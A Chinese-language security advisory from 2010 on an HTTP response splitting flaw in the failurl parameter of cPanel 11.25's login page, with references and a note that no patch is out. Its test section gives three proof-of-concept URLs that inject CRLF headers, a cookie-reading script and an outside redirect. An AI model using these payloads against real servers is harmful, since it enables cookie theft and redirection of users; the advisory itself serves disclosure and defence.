cPanel failurl参数HTTP响应拆分漏洞
来源:岁月联盟
时间:2010-01-30
cPanel cPanel 11.25
cPanel WebHost Manager 11.25漏洞描述:
BUGTRAQ ID: 37902
cPanel是基于Web的工具,用于自动化控制网站和服务器。
cPanel的登录页面在用户登录失败的情况下在Location HTTP头中将failurl参数值返回给了客户端。由于没有对这个参数值执行任何过滤,用户提交恶意登录请求就可以执行HTTP响应拆分安全,导致在用户浏览器会话中执行任意代码。<*参考
Moshe Ben Abu (mtrancer@gmail.com)
http://secunia.com/advisories/38255/
http://www.rec-sec.com/advisories/cpanel_http_response_splitting_vulnerability.txt
*>
测试方法:
本站提供程序(方法)可能带有安全性,仅供安全研究与教学之用,风险自负!http://www.example.com/login/?user=foo&pass=bar&failurl=%0D%0ASet-Cookie%3A%20Rec=Sec
http://www.example.com/login/?user=foo&pass=bar&failurl=%0D%0AContent-Type:%20text/html%0D%0A%0D%0A%3Cscript%3Ealert%28%22Recognize-Security%20-%20%22%2Bdocument.cookie%29;%3C/script%3E%3C!--
http://www.example.com/login/?user=foo&pass=bar&failurl=http://www.rec-sec.comSEBUG安全建议:
厂商补丁:
cPanel
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.cpanel.net
